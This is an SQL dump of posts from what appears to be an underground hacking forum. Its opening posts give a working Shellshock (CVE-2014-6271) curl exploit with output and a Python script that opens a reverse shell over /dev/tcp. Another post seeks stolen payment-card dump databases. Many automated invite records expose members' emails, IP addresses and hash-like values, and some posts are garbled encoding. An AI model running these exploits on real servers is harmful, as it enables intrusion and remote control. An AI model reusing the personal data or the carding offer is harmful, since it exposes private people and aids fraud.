(2153, 1767, 0, 'lumbricus', 39, 'Cve-2014-6271', 1411641697, 'EXPLOIT: [PHP]curl -A \"() { :;}; echo Content-type:text/plain;echo; /bin/uname -a \" http://127.0.0.1/cgi-bin/file.cgi [/PHP]\r\n\r\nResult: [PHP]Linux test.test.commmm 2.6.32-042stab088.4 #1 SMP Thu Apr 3 14:11:05 MSK 2014 x86_64 x86_64 x86_64 GNU/Linux[/PHP]', 1, 0, '', 0, 1, 0, 0, 0),
(2154, 1768, 0, 'Invite', 2, '{$name}', 1411645121, '[SIZE=\'4\'][COLOR=\'Sienna\']moni[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: moni.hbh@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.228.105.71\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Opera/9.80 (Android; Opera Mini/7.5.35613/35.4530; U; en) Presto/2.8.119 Version/11.10\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://moni.mobi | moni.mobi \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2155, 1769, 0, 'Invite', 2, '{$name}', 1411647371, '[SIZE=\'4\'][COLOR=\'Sienna\']stealth[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 425404/darooster@jabbim.cz\n[b]e-mail[/b]: mvig.info@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 67.244.100.129\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Stealth : lobodenko.vl@mail.ru : 82.207.101.82 : 26b39933de686a1a61e431d2147fdc46\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://stealth.ultd.net | stealth.ultd.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2156, 1064, 1073, 'psych0tic', 52, '', 1411652126, 'Hello friends, I need access of dumpshops DB and also buying dump data from t1+t2 or t2 only. Good offers for work on % or upfront$ \n\nJabber + otr required.\n\nrespect', 1, 0, '', 0, 1, 0, 0, 0),
(2157, 1767, 2153, 'syslink', 13, '', 1411657400, '[url]https://github.com/SleepProgger/another_shellshock_test[/url]\n[php]\nenv x=\'() { :;}; echo vulnerable\' bash -c /bin/bash\nvulnerable\n\ncurl -k -H \'User-Agent: () { :;}; echo aa>/tmp/aa\' https://localhost/cgi-bin/hihai\n\nAnd here\'s a little reverse shell:\n#\n#CVE-2014-6271 cgi-bin reverse shell\n#\n\nimport httplib,urllib,sys\n\nif (len(sys.argv)<4):\n print \"Usage: %s \" % sys.argv[0]\n print \"Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080\" % sys.argv[0]\n exit(0)\n\nconn = httplib.HTTPConnection(sys.argv[1])\nreverse_shell=\"() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1\" % sys.argv[3]\n\nheaders = {\"Content-type\": \"application/x-www-form-urlencoded\",\n \"test\":reverse_shell }\nconn.request(\"GET\",sys.argv[2],headers=headers)\nres = conn.getresponse()\nprint res.status, res.reason\ndata = res.read()\nprint data\n\n [/php]', 1, 0, '', 0, 1, 0, 0, 0),
(2202, 1810, 0, 'Invite', 2, '{$name}', 1411822286, '[SIZE=\'4\'][COLOR=\'Sienna\']pirax[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: monaco12@jabber.org\n[b]e-mail[/b]: kingscool1@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 89.136.16.186\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://pirax.com | pirax.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2201, 1809, 0, 'Invite', 2, '{$name}', 1411820182, '[SIZE=\'4\'][COLOR=\'Sienna\']Nir[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: 665544@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 103.243.26.24\n[*][b]real ip[/b]: 103.243.26.24\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.102 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://nir.se | nir.se \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2197, 1806, 0, 'Invite', 2, '{$name}', 1411750650, '[SIZE=\'4\'][COLOR=\'Sienna\']Explorecoding[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: nikkie_is_bae@exploit.im\n[b]e-mail[/b]: None64HF@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 69.251.78.210\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://explorecoding.weebly.com | explorecoding.weebly.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2196, 1805, 0, 'Invite', 2, '{$name}', 1411736385, '[SIZE=\'4\'][COLOR=\'Sienna\']microsofti[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: hanskanns@smtp.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 195.243.60.226\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2195, 1804, 0, 'Invite', 2, '{$name}', 1411725110, '[SIZE=\'4\'][COLOR=\'Sienna\']John[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: none\n[b]e-mail[/b]: appbdx@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.93.109.245\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : john : johnfishborn@gmail.com : 137.138.101.81 : 036bbd71992482ac2d2b46c3534c556b\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/john | https://twitter.com/john \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2192, 1803, 0, 'Invite', 2, '{$name}', 1411673862, '[SIZE=\'4\'][COLOR=\'Sienna\']blackslikz[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: blackslikz@jabber.se\n[b]e-mail[/b]: nextdreamnet@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 198.23.71.93\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2159.4 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2193, 1064, 1073, 'Psych0tr1a', 11, '', 1411683733, 'ýðшõû ÿðру ñðóþò ýð óþòðх öôу úþýтðúтøú)', 1, 0, '', 0, 1, 0, 0, 0),
(2220, 1820, 0, 'Invite', 2, '{$name}', 1411992475, '[SIZE=\'4\'][COLOR=\'Sienna\']toodrunktohack[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: blackzero@jabber.ccc.de\n[b]e-mail[/b]: toodrunkothack@hotmail.com\n[b]Info[/b]: IT Security Researcher\r\n0day SQL/XSS Web Application Exploit Hunter\r\n\r\nNetwork IT Security\r\nBug bounty hunter!\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 77.49.108.217\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2213, 1819, 0, 'w0rm', 1, 'w0rm Cloud', 1411955430, 'Ãâ€Ã¾Ã±Ã°Ã²Ã»ÃµÃ½ þñûðчýыù ÑÂõрòøѠôûѠþñüõýð фðùûðüø.\n\n[B]Öõûðющøü ÿþÿþûýÑÂть òыôðü ôþÑÂтуÿ.[/B]\n\n\n[IMG]http://144.76.206.168/index.php/core/preview.png?file=%2Fimg%2Fáýøüþú%20ÑÂúрðýð%202014-09-29%20ò%207.51.49.png&x=512&y=307&[/IMG]\n\nßðÿúð Ѡñð÷ðüø.\n[URL=\"http://144.76.206.168/public.php?service=files&t=0ec93f7944739e98ea0f9f640db268ee\"]Link[/URL]', 1, 0, '', 0, 1, 0, 0, 0),
(2210, 1648, 1919, 'w0rm', 1, '', 1411933014, '...', 1, 0, '', 0, 1, 0, 0, 0),
(2212, 1818, 0, 'Invite', 2, '{$name}', 1411945374, '[SIZE=\'4\'][COLOR=\'Sienna\']Houdini[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 673738690 \n[b]e-mail[/b]: bennabdellah.m@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.97.235.212\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.youtube.com/user/houdini3d | http://www.youtube.com/user/houdini3d \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2209, 1817, 0, 'Invite', 2, '{$name}', 1411925372, '[SIZE=\'4\'][COLOR=\'Sienna\']Abr1k0s[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Abr1k0s.ctf.team@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 93.187.180.164\n[*][b]real ip[/b]: 93.187.180.164\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://forum.gaijin.ru/index.php?/user/66929-abr1kos/ | http://forum.gaijin.ru/index.php?/user/66929-abr1kos/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2205, 1813, 0, 'Invite', 2, '{$name}', 1411882830, '[SIZE=\'4\'][COLOR=\'Sienna\']evoo[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: evoobreaker@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 36.85.134.25\n[*][b]real ip[/b]: 36.85.134.25\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://evoo.biz | evoo.biz \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2206, 1814, 0, 'Invite', 2, '{$name}', 1411924060, '[SIZE=\'4\'][COLOR=\'Sienna\']Abr1k0s[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Abr1k0s.ctf.team@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 93.187.180.164\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://forum.gaijin.ru/index.php?/user/66929-abr1kos/ | http://forum.gaijin.ru/index.php?/user/66929-abr1kos/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2207, 1815, 0, 'Invite', 2, '{$name}', 1411924925, '[SIZE=\'4\'][COLOR=\'Sienna\']Abr1k0s[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Abr1k0s.ctf.team@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.250.235\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://forum.gaijin.ru/index.php?/user/66929-abr1kos/ | http://forum.gaijin.ru/index.php?/user/66929-abr1kos/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2208, 1816, 0, 'Invite', 2, '{$name}', 1411925358, '[SIZE=\'4\'][COLOR=\'Sienna\']Abr1k0s[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Abr1k0s.ctf.team@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 93.187.180.164\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://forum.gaijin.ru/index.php?/user/66929-abr1kos/ | http://forum.gaijin.ru/index.php?/user/66929-abr1kos/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2203, 1811, 0, 'Invite', 2, '{$name}', 1411824082, '[SIZE=\'4\'][COLOR=\'Sienna\']lekssays[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: ahmed@lekssays.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.137.35.130\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our 